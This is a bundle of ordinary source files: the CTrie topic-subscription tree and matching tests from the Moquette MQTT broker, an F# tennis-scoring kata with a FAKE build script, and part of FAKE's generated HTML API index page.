final CNode mainNode = new CNode();
mainNode.setToken(ROOT);
this.root = new INode(mainNode);
}
Optional<CNode> lookup(Topic topic) {
INode inode = this.root;
Token token = topic.headToken();
while (!topic.isEmpty() && (inode.mainNode().anyChildrenMatch(token))) {
topic = topic.exceptHeadToken();
inode = inode.mainNode().childOf(token);
token = topic.headToken();
}
if (inode == null || !topic.isEmpty()) {
return Optional.empty();
}
return Optional.of(inode.mainNode());
}
enum NavigationAction {
MATCH, GODEEP, STOP
}
private NavigationAction evaluate(Topic topic, CNode cnode) {
if (Token.MULTI.equals(cnode.getToken())) {
return NavigationAction.MATCH;
}
if (topic.isEmpty()) {
return NavigationAction.STOP;
}
final Token token = topic.headToken();
if (!(Token.SINGLE.equals(cnode.getToken()) || cnode.getToken().equals(token) || ROOT.equals(cnode.getToken()))) {
return NavigationAction.STOP;
}
return NavigationAction.GODEEP;
}
public Set<Subscription> recursiveMatch(Topic topic) {
return recursiveMatch(topic, this.root);
}
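// Depth-first match: a MULTI ('#') node matches immediately, STOP prunes the branch, and on
// GODEEP the head token is consumed (except at the root) before recursing into every child;
// subscriptions at the current node are collected once the topic is fully consumed.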
private Set<Subscription> recursiveMatch(Topic topic, INode inode) {
CNode cnode = inode.mainNode();
if (cnode instanceof TNode) {
return Collections.emptySet();
}
NavigationAction action = evaluate(topic, cnode);
if (action == NavigationAction.MATCH) {
return cnode.subscriptions;
}
if (action == NavigationAction.STOP) {
return Collections.emptySet();
}
Topic remainingTopic = (ROOT.equals(cnode.getToken())) ? topic : topic.exceptHeadToken();
Set<Subscription> subscriptions = new HashSet<>();
if (remainingTopic.isEmpty()) {
subscriptions.addAll(cnode.subscriptions);
}
for (INode subInode : cnode.allChildren()) {
subscriptions.addAll(recursiveMatch(remainingTopic, subInode));
}
return subscriptions;
}
public void addToTree(Subscription newSubscription) {
Action res;
do {
res = insert(newSubscription.topicFilter, this.root, newSubscription);
} while (res == Action.REPEAT);
}
private Action insert(Topic topic, final INode inode, Subscription newSubscription) {
Token token = topic.headToken();
if (!topic.isEmpty() && inode.mainNode().anyChildrenMatch(token)) {
Topic remainingTopic = topic.exceptHeadToken();
INode nextInode = inode.mainNode().childOf(token);
return insert(remainingTopic, nextInode, newSubscription);
} else {
if (topic.isEmpty()) {
return insertSubscription(inode, newSubscription);
} else {
return createNodeAndInsertSubscription(topic, inode, newSubscription);
}
}
}
private Action insertSubscription(INode inode, Subscription newSubscription) {
CNode cnode = inode.mainNode();
CNode updatedCnode = cnode.copy().addSubscription(newSubscription);
if (inode.compareAndSet(cnode, updatedCnode)) {
return Action.OK;
} else {
return Action.REPEAT;
}
}
private Action createNodeAndInsertSubscription(Topic topic, INode inode, Subscription newSubscription) {
INode newInode = createPathRec(topic, newSubscription);
CNode cnode = inode.mainNode();
CNode updatedCnode = cnode.copy();
updatedCnode.add(newInode);
return inode.compareAndSet(cnode, updatedCnode) ? Action.OK : Action.REPEAT;
}
private INode createPathRec(Topic topic, Subscription newSubscription) {
Topic remainingTopic = topic.exceptHeadToken();
if (!remainingTopic.isEmpty()) {
INode inode = createPathRec(remainingTopic, newSubscription);
CNode cnode = new CNode();
cnode.setToken(topic.headToken());
cnode.add(inode);
return new INode(cnode);
} else {
return createLeafNodes(topic.headToken(), newSubscription);
}
}
private INode createLeafNodes(Token token, Subscription newSubscription) {
CNode newLeafCnode = new CNode();
newLeafCnode.setToken(token);
newLeafCnode.addSubscription(newSubscription);
return new INode(newLeafCnode);
}
public void removeFromTree(Topic topic, String clientID) {
Action res;
do {
res = remove(clientID, topic, this.root, NO_PARENT);
} while (res == Action.REPEAT);
}
private Action remove(String clientId, Topic topic, INode inode, INode iParent) {
Token token = topic.headToken();
if (!topic.isEmpty() && (inode.mainNode().anyChildrenMatch(token))) {
Topic remainingTopic = topic.exceptHeadToken();
INode nextInode = inode.mainNode().childOf(token);
return remove(clientId, remainingTopic, nextInode, inode);
} else {
final CNode cnode = inode.mainNode();
if (cnode instanceof TNode) {
// this inode is a tomb, has no clients and should be cleaned up
// Because we implemented cleanTomb below, this should be rare, but possible
// Consider calling cleanTomb here too
return Action.OK;
}
if (cnode.containsOnly(clientId) && topic.isEmpty() && cnode.allChildren().isEmpty()) {
// last client to leave this node, AND there are no downstream children, remove via TNode tomb
if (inode == this.root) {
return inode.compareAndSet(cnode, inode.mainNode().copy()) ? Action.OK : Action.REPEAT;
}
TNode tnode = new TNode();
return inode.compareAndSet(cnode, tnode) ? cleanTomb(inode, iParent) : Action.REPEAT;
} else if (cnode.contains(clientId) && topic.isEmpty()) {
CNode updatedCnode = cnode.copy();
updatedCnode.removeSubscriptionsFor(clientId);
return inode.compareAndSet(cnode, updatedCnode) ? Action.OK : Action.REPEAT;
} else {
//someone else already removed
return Action.OK;
}
}
}
/**
 * Disposes of the TNode in a separate atomic CAS operation, per
 * http://bravenewgeek.com/breaking-and-entering-lose-the-lock-while-embracing-concurrency/
 *
 * We roughly follow the approach above, but we allow a CNode with no Subscriptions to linger (for now).
 *
 * @param inode the INode that points to the tomb node.
 * @param iParent the parent INode.
 * @return REPEAT if this method wasn't successful, otherwise OK.
 */
private Action cleanTomb(INode inode, INode iParent) {
CNode updatedCnode = iParent.mainNode().copy();
updatedCnode.remove(inode);
return iParent.compareAndSet(iParent.mainNode(), updatedCnode) ? Action.OK : Action.REPEAT;
}
public int size() {
SubscriptionCounterVisitor visitor = new SubscriptionCounterVisitor();
dfsVisit(this.root, visitor, 0);
return visitor.getResult();
}
public String dumpTree() {
DumpTreeVisitor visitor = new DumpTreeVisitor();
dfsVisit(this.root, visitor, 0);
return visitor.getResult();
}
private void dfsVisit(INode node, IVisitor<?> visitor, int deep) {
if (node == null) {
return;
}
visitor.visit(node.mainNode(), deep);
++deep;
for (INode child : node.mainNode().allChildren()) {
dfsVisit(child, visitor, deep);
}
}
}
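// Illustrative usage sketch (not part of the original source): the public entry points
// above are typically driven like this, using the Subscription constructor and the
// Topic.asTopic helper exercised by the tests further below. The client id and topic
// strings here are made up for the example.
//
//   CTrie tree = new CTrie();
//   tree.addToTree(new Subscription("sensor-client", Topic.asTopic("sensors/+/temperature"), MqttQoS.AT_MOST_ONCE));
//   Set<Subscription> matched = tree.recursiveMatch(Topic.asTopic("sensors/kitchen/temperature"));
//   tree.removeFromTree(Topic.asTopic("sensors/+/temperature"), "sensor-client");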
<|start_filename|>broker/src/main/java/io/moquette/broker/subscriptions/TNode.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
class TNode extends CNode {
@Override
public Token getToken() {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public void setToken(Token token) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
INode childOf(Token token) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
CNode copy() {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public void add(INode newINode) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
CNode addSubscription(Subscription newSubscription) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
boolean containsOnly(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
public boolean contains(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
void removeSubscriptionsFor(String clientId) {
throw new IllegalStateException("Can't be invoked on TNode");
}
@Override
boolean anyChildrenMatch(Token token) {
return false;
}
}
<|start_filename|>broker/src/test/java/io/moquette/broker/subscriptions/CTrieSubscriptionDirectoryMatchingTest.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
import io.moquette.broker.ISubscriptionsRepository;
import io.moquette.persistence.MemorySubscriptionsRepository;
import io.netty.handler.codec.mqtt.MqttQoS;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Optional;
import java.util.Set;
import static io.moquette.broker.subscriptions.CTrieTest.clientSubOnTopic;
import static io.moquette.broker.subscriptions.Topic.asTopic;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class CTrieSubscriptionDirectoryMatchingTest {
private CTrieSubscriptionDirectory sut;
private ISubscriptionsRepository sessionsRepository;
@BeforeEach
public void setUp() {
sut = new CTrieSubscriptionDirectory();
this.sessionsRepository = new MemorySubscriptionsRepository();
sut.init(this.sessionsRepository);
}
@Test
public void testMatchSimple() {
Subscription slashSub = clientSubOnTopic("TempSensor1", "/");
sut.add(slashSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isEmpty();
Subscription slashFinanceSub = clientSubOnTopic("TempSensor1", "/finance");
sut.add(slashFinanceSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isEmpty();
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).contains(slashFinanceSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("/"))).contains(slashSub);
}
@Test
public void testMatchSimpleMulti() {
Subscription anySub = clientSubOnTopic("TempSensor1", "#");
sut.add(anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).contains(anySub);
Subscription financeAnySub = clientSubOnTopic("TempSensor1", "finance/#");
sut.add(financeAnySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).containsExactlyInAnyOrder(financeAnySub, anySub);
}
@Test
public void testMatchingDeepMulti_one_layer() {
Subscription anySub = clientSubOnTopic("AllSensor1", "#");
Subscription financeAnySub = clientSubOnTopic("FinanceSensor", "finance/#");
sut.add(anySub);
sut.add(financeAnySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock")))
.containsExactlyInAnyOrder(financeAnySub, anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock/ibm")))
.containsExactlyInAnyOrder(financeAnySub, anySub);
// System.out.println(sut.dumpTree());
}
@Test
public void testMatchingDeepMulti_two_layer() {
Subscription financeAnySub = clientSubOnTopic("FinanceSensor", "finance/stock/#");
sut.add(financeAnySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock/ibm"))).containsExactly(financeAnySub);
}
@Test
public void testMatchSimpleSingle() {
Subscription anySub = clientSubOnTopic("AnySensor", "+");
sut.add(anySub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).containsExactly(anySub);
Subscription financeOne = clientSubOnTopic("AnySensor", "finance/+");
sut.add(financeOne);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/stock"))).containsExactly(financeOne);
}
@Test
public void testMatchManySingle() {
Subscription manySub = clientSubOnTopic("AnySensor", "+/+");
sut.add(manySub);
// verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).contains(manySub);
}
@Test
public void testMatchSlashSingle() {
Subscription slashPlusSub = clientSubOnTopic("AnySensor", "/+");
sut.add(slashPlusSub);
Subscription anySub = clientSubOnTopic("AnySensor", "+");
sut.add(anySub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).containsOnly(slashPlusSub);
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance"))).doesNotContain(anySub);
}
@Test
public void testMatchManyDeepSingle() {
Subscription slashPlusSub = clientSubOnTopic("FinanceSensor1", "/finance/+/ibm");
sut.add(slashPlusSub);
Subscription slashPlusDeepSub = clientSubOnTopic("FinanceSensor2", "/+/stock/+");
sut.add(slashPlusDeepSub);
// Verify
assertThat(sut.matchWithoutQosSharpening(asTopic("/finance/stock/ibm")))
.containsExactlyInAnyOrder(slashPlusSub, slashPlusDeepSub);
}
@Test
public void testMatchSimpleMulti_allTheTree() {
Subscription sub = clientSubOnTopic("AnySensor1", "#");
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic("finance"))).isNotEmpty();
assertThat(sut.matchWithoutQosSharpening(asTopic("finance/ibm"))).isNotEmpty();
}
@Test
public void rogerLightTopicMatches() {
assertMatch("foo/bar", "foo/bar");
assertMatch("foo/bar", "foo/bar");
assertMatch("foo/+", "foo/bar");
assertMatch("foo/+/baz", "foo/bar/baz");
assertMatch("foo/+/#", "foo/bar/baz");
assertMatch("#", "foo/bar/baz");
assertNotMatch("foo/bar", "foo");
assertNotMatch("foo/+", "foo/bar/baz");
assertNotMatch("foo/+/baz", "foo/bar/bar");
assertNotMatch("foo/+/#", "fo2/bar/baz");
assertMatch("#", "/foo/bar");
assertMatch("/#", "/foo/bar");
assertNotMatch("/#", "foo/bar");
assertMatch("foo//bar", "foo//bar");
assertMatch("foo//+", "foo//bar");
assertMatch("foo/+/+/baz", "foo///baz");
assertMatch("foo/bar/+", "foo/bar/");
}
private void assertMatch(String s, String t) {
sut = new CTrieSubscriptionDirectory();
ISubscriptionsRepository sessionsRepository = new MemorySubscriptionsRepository();
sut.init(sessionsRepository);
Subscription sub = clientSubOnTopic("AnySensor1", s);
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic(t))).isNotEmpty();
}
private void assertNotMatch(String subscription, String topic) {
sut = new CTrieSubscriptionDirectory();
ISubscriptionsRepository sessionsRepository = new MemorySubscriptionsRepository();
sut.init(sessionsRepository);
Subscription sub = clientSubOnTopic("AnySensor1", subscription);
sut.add(sub);
assertThat(sut.matchWithoutQosSharpening(asTopic(topic))).isEmpty();
}
@Test
public void testOverlappingSubscriptions() {
Subscription genericSub = new Subscription("Sensor1", asTopic("a/+"), MqttQoS.AT_MOST_ONCE);
this.sessionsRepository.addNewSubscription(genericSub);
sut.add(genericSub);
Subscription specificSub = new Subscription("Sensor1", asTopic("a/b"), MqttQoS.AT_MOST_ONCE);
this.sessionsRepository.addNewSubscription(specificSub);
sut.add(specificSub);
//Exercise
final Set<Subscription> matchingForSpecific = sut.matchQosSharpening(asTopic("a/b"));
// Verify
assertThat(matchingForSpecific.size()).isEqualTo(1);
}
@Test
public void removeSubscription_withDifferentClients_subscribedSameTopic() {
Subscription slashSub = clientSubOnTopic("Sensor1", "/topic");
sut.add(slashSub);
Subscription slashSub2 = clientSubOnTopic("Sensor2", "/topic");
sut.add(slashSub2);
// Exercise
sut.removeSubscription(asTopic("/topic"), slashSub2.clientId);
// Verify
Subscription remainedSubscription = sut.matchWithoutQosSharpening(asTopic("/topic")).iterator().next();
assertThat(remainedSubscription.clientId).isEqualTo(slashSub.clientId);
assertEquals(slashSub.clientId, remainedSubscription.clientId);
}
@Test
public void removeSubscription_sameClients_subscribedSameTopic() {
Subscription slashSub = clientSubOnTopic("Sensor1", "/topic");
sut.add(slashSub);
// Exercise
sut.removeSubscription(asTopic("/topic"), slashSub.clientId);
// Verify
final Set<Subscription> matchingSubscriptions = sut.matchWithoutQosSharpening(asTopic("/topic"));
assertThat(matchingSubscriptions).isEmpty();
}
/*
* Test for Issue #49
*/
@Test
public void duplicatedSubscriptionsWithDifferentQos() {
Subscription client2Sub = new Subscription("client2", asTopic("client/test/b"), MqttQoS.AT_MOST_ONCE);
this.sut.add(client2Sub);
Subscription client1SubQoS0 = new Subscription("client1", asTopic("client/test/b"), MqttQoS.AT_MOST_ONCE);
this.sut.add(client1SubQoS0);
Subscription client1SubQoS2 = new Subscription("client1", asTopic("client/test/b"), MqttQoS.EXACTLY_ONCE);
this.sut.add(client1SubQoS2);
// Verify
Set<Subscription> subscriptions = this.sut.matchQosSharpening(asTopic("client/test/b"));
assertThat(subscriptions).contains(client1SubQoS2);
assertThat(subscriptions).contains(client2Sub);
final Optional<Subscription> matchingClient1Sub = subscriptions
.stream()
.filter(s -> s.equals(client1SubQoS0))
.findFirst();
assertTrue(matchingClient1Sub.isPresent());
Subscription client1Sub = matchingClient1Sub.get();
assertThat(client1SubQoS0.getRequestedQos()).isNotEqualTo(client1Sub.getRequestedQos());
// client1SubQoS2 should override client1SubQoS0
assertThat(client1Sub.getRequestedQos()).isEqualTo(client1SubQoS2.getRequestedQos());
}
}
| 10088/moquette |
<|start_filename|>KataTennis/Tennis.fs<|end_filename|>
module Ploeh.Katas.Tennis
type Player = PlayerOne | PlayerTwo
type Point = Love | Fifteen | Thirty
type PointsData = { PlayerOnePoint : Point; PlayerTwoPoint : Point }
type FortyData = { Player : Player; OtherPlayerPoint : Point }
type Score =
| Points of PointsData
| Forty of FortyData
| Deuce
| Advantage of Player
| Game of Player
let other = function PlayerOne -> PlayerTwo | PlayerTwo -> PlayerOne
let incrementPoint = function
| Love -> Some Fifteen
| Fifteen -> Some Thirty
| Thirty -> None
let pointTo player point current =
match player with
| PlayerOne -> { current with PlayerOnePoint = point }
| PlayerTwo -> { current with PlayerTwoPoint = point }
let pointFor player current =
match player with
| PlayerOne -> current.PlayerOnePoint
| PlayerTwo -> current.PlayerTwoPoint
// Transitions
let scoreWhenGame winner = Game winner
let scoreWhenAdvantage advantagedPlayer winner =
if advantagedPlayer = winner
then Game winner
else Deuce
let scoreWhenDeuce winner = Advantage winner
let scoreWhenForty current winner =
if current.Player = winner
then Game winner
else
match incrementPoint current.OtherPlayerPoint with
| Some p -> Forty { current with OtherPlayerPoint = p }
| None -> Deuce
let scoreWhenPoints current winner =
match pointFor winner current |> incrementPoint with
| Some np -> pointTo winner np current |> Points
| None -> Forty {
Player = winner
OtherPlayerPoint = pointFor (other winner) current }
// State machine
let score current winner =
match current with
| Points p -> scoreWhenPoints p winner
| Forty f -> scoreWhenForty f winner
| Deuce -> scoreWhenDeuce winner
| Advantage a -> scoreWhenAdvantage a winner
| Game g -> scoreWhenGame g
let newGame = Points { PlayerOnePoint = Love; PlayerTwoPoint = Love }
let scoreSeq wins = Seq.fold score newGame wins
// Formatting
let pointToString = function
| Love -> "love"
| Fifteen -> "15"
| Thirty -> "30"
let scoreToString playerOneName playerTwoName = function
| Points p ->
if p.PlayerOnePoint = p.PlayerTwoPoint
then p.PlayerOnePoint |> pointToString |> sprintf "%s-all"
else
sprintf
"%s-%s"
(pointToString p.PlayerOnePoint)
(pointToString p.PlayerTwoPoint)
| Forty f ->
let other = pointToString f.OtherPlayerPoint
if f.Player = PlayerOne
then sprintf "40-%s" other
else sprintf "%s-40" other
| Deuce -> "deuce"
| Advantage a ->
if a = PlayerOne
then sprintf "advantage %s" playerOneName
else sprintf "advantage %s" playerTwoName
| Game g ->
if g = PlayerOne
then sprintf "game %s" playerOneName
else sprintf "game %s" playerTwoName
<|start_filename|>KataTennis/Usage.fsx<|end_filename|>
#load "Tennis.fs"
open Ploeh.Katas.Tennis
let firstBall = score newGame PlayerTwo
let secondBall = score firstBall PlayerOne
let simpleGame =
scoreSeq [
PlayerTwo; PlayerTwo; PlayerOne; PlayerTwo; PlayerOne; PlayerOne;
PlayerTwo; PlayerTwo]
let displayGame = simpleGame |> scoreToString "<NAME>" "<NAME>"
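// For reference (derived from the functions in Tennis.fs; this comment is not part of
// the original script): with the ball sequence above the fold reaches deuce after the
// sixth ball, PlayerTwo then takes advantage and the game, so simpleGame evaluates to
// Game PlayerTwo and displayGame renders as "game " followed by the second player's name.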
<|start_filename|>Build.fsx<|end_filename|>
#r @"packages/FAKE.4.9.3/tools/FakeLib.dll"
open Fake
open Fake.Testing
Target "Clean" (fun _ ->
directExec (fun info ->
info.FileName <- "git"
info.Arguments <- "clean -xdf")
|> ignore)
Target "Build" (fun _ ->
!! "KataTennis.sln"
|> MSBuildDebug "" "Rebuild"
|> ignore)
Target "Test" (fun _ ->
!! "*/bin/Debug/*PropertyBased.dll"
|> xUnit2 id)
"Clean"
==> "Build"
==> "Test"
RunTargetOrDefault "Test"
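// Illustrative invocation (an assumption, not part of the original script): with the
// FAKE 4.x package restored as referenced at the top of this file, the build is
// typically started with something like
//   packages/FAKE.4.9.3/tools/FAKE.exe Build.fsx
// which runs the default target chain Clean ==> Build ==> Test defined above.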
<|start_filename|>packages/FAKE.4.9.3/docs/apidocs/index.html<|end_filename|>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Namespaces - FAKE - F# Make</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>, <NAME>, <NAME>">
<script src="https://code.jquery.com/jquery-1.8.0.js"></script>
<script src="https://code.jquery.com/ui/1.8.23/jquery-ui.js"></script>
<script src="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.2.1/js/bootstrap.min.js"></script>
<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<link href="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.2.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link type="text/css" rel="stylesheet" href="http://fsharp.github.io/FAKE/content/style.css" />
<script type="text/javascript" src="http://fsharp.github.io/FAKE/content/tips.js"></script>
<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="masthead">
<ul class="nav nav-pills pull-right">
<li><a href="http://fsharp.org">fsharp.org</a></li>
<li><a href="http://github.com/fsharp/fake">github page</a></li>
</ul>
<h3 class="muted"><a href="http://fsharp.github.io/FAKE/index.html">FAKE - F# Make</a></h3>
</div>
<hr />
<div class="row">
<div class="span9" id="main">
<h1>FAKE - F# Make</h1>
<h2>Fake Namespace</h2>
<div>
<table class="table table-bordered module-list">
<thead>
<tr><td>Module</td><td>Description</td></tr>
</thead>
<tbody>
<tr>
<td class="module-name">
<a href="fake-additionalsyntax.html">AdditionalSyntax</a>
</td>
<td class="xmldoc"><p>Provides functions and operators to deal with FAKE targets and target dependencies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-androidpublisher.html">AndroidPublisher</a>
</td>
<td class="xmldoc"></td>
</tr>
<tr>
<td class="module-name">
<a href="fake-appveyor.html">AppVeyor</a>
</td>
<td class="xmldoc"><p>Contains code to configure FAKE for AppVeyor integration</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-archivehelper.html">ArchiveHelper</a>
</td>
<td class="xmldoc"><p>Provides utility tasks for storing and compressing files in archives.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-assemblyinfofile.html">AssemblyInfoFile</a>
</td>
<td class="xmldoc"><p>Contains tasks to generate AssemblyInfo files for C# and F#.
There is also a tutorial about the <a href="../assemblyinfo.html">AssemblyInfo tasks</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-assemblyinfohelper.html">AssemblyInfoHelper</a>
</td>
<td class="xmldoc"><p>Generates an AssemblyInfo file</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-azurehelper.html">AzureHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to control the local Azure Emulator</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-boot.html">Boot</a>
</td>
<td class="xmldoc"><p>Implements support for boostrapping FAKE scripts. A bootstrapping
<code>build.fsx</code> script executes twice (in two stages), allowing to
download dependencies with NuGet and do other preparatory work in
the first stage, and have these dependencies available in the
second stage.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-buildserverhelper.html">BuildServerHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow build scripts to interact with a build server.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-cachehelper.html">CacheHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allows to deal with a cache.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-changewatcher.html">ChangeWatcher</a>
</td>
<td class="xmldoc"><p>This module contains helpers to react to file system events.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-configurationhelper.html">ConfigurationHelper</a>
</td>
<td class="xmldoc"><p>Contains functions which allow to read and write config files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-cschelper.html">CscHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to compile C# source files with CSC.EXE (C# Compiler).</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-docuhelper.html">DocuHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions to run the XML documentation tool "docu".</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dotcover.html">DotCover</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://www.jetbrains.com/dotcover/">DotCover</a> on .NET assemblies.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dynamicsnav.html">DynamicsNav</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow to interact with Microsoft Dynamics NAV.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-dynamicsnavfile.html">DynamicsNavFile</a>
</td>
<td class="xmldoc"><p>Provides an abstraction over Dynamics NAV object files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-environmenthelper.html">EnvironmentHelper</a>
</td>
<td class="xmldoc"><p>This module contains functions which allow to read and write environment variables and build parameters</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fsihelper.html">FSIHelper</a>
</td>
<td class="xmldoc"><p>Contains helper functions which allow to interact with the F# Interactive.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fsharpformatting.html">FSharpFormatting</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to run FSharp.Formatting for generating documentation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filehelper.html">FileHelper</a>
</td>
<td class="xmldoc"><p>Contains helper function which allow to deal with files and directories.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filesystem.html">FileSystem</a>
</td>
<td class="xmldoc"><p>This module contains a file pattern globbing implementation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-filesystemhelper.html">FileSystemHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to interact with the file system.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fileutils.html">FileUtils</a>
</td>
<td class="xmldoc"><p>Shell-like functions. Similar to <a href="http://www.ruby-doc.org/stdlib-2.0.0/libdoc/rake/rdoc/FileUtils.html">Ruby's FileUtils</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fixiehelper.html">FixieHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to run <a href="http://fixie.github.io/">Fixie</a> unit tests.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fschelper.html">FscHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to compiles F# source file with the <a href="https://github.com/fsharp/FSharp.Compiler.Service">FSharp.Compiler.Service</a>.
There is also a tutorial about the <a href="../fsc.html">F# compiler tasks</a> available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ftphelper.html">FtpHelper</a>
</td>
<td class="xmldoc"><p>Contains helpers which allow to upload a whole folder/specific file into a FTP Server.
Uses <code>Passive Mode</code> FTP and handles all files as binary (and not ASCII).
Assumes direct network connectivity to destination FTP server (not via a proxy).
Does not support FTPS and SFTP.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-fxcophelper.html">FxCopHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which can be used to run <a href="http://msdn.microsoft.com/en-us/library/bb429476(v=vs.80).aspx">FxCop</a> on .NET assemblies. There is also a <a href="../fxcop.html">tutorial</a> for this task available.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-gachelper.html">GACHelper</a>
</td>
<td class="xmldoc"><p>This module contains helper function for the GAC</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-globbing.html">Globbing</a>
</td>
<td class="xmldoc"><p>This module contains a file pattern globbing implementation.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-htmlhelpworkshophelper.html">HTMLHelpWorkShopHelper</a>
</td>
<td class="xmldoc"><p>Contains a task which allows to use <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms670169(v=vs.85).aspx">HTML Help Workshop</a> in order to compile a help project.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-hipchatnotificationhelper.html">HipChatNotificationHelper</a>
</td>
<td class="xmldoc"><p>Contains a task to send notification messages to a <a href="https://www.hipchat.com/">HipChat</a> room</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-hockeyapphelper.html">HockeyAppHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks to interact with <a href="http://hockeyapp.com">HockeyApp</a></p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-ilmergehelper.html">ILMergeHelper</a>
</td>
<td class="xmldoc"><p>Contains task a task which allows to merge .NET assemblies with <a href="http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx">ILMerge</a>.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msbuildhelper.html">MSBuildHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to use MSBuild (or xBuild on Linux/Unix) to build .NET project files or solution files.</p>
</td>
</tr>
<tr>
<td class="module-name">
<a href="fake-msihelper.html">MSIHelper</a>
</td>
<td class="xmldoc"><p>Contains tasks which allow to run msiexec in order to install or uninstall msi files.</p>
</td>
</tr>
<tr>
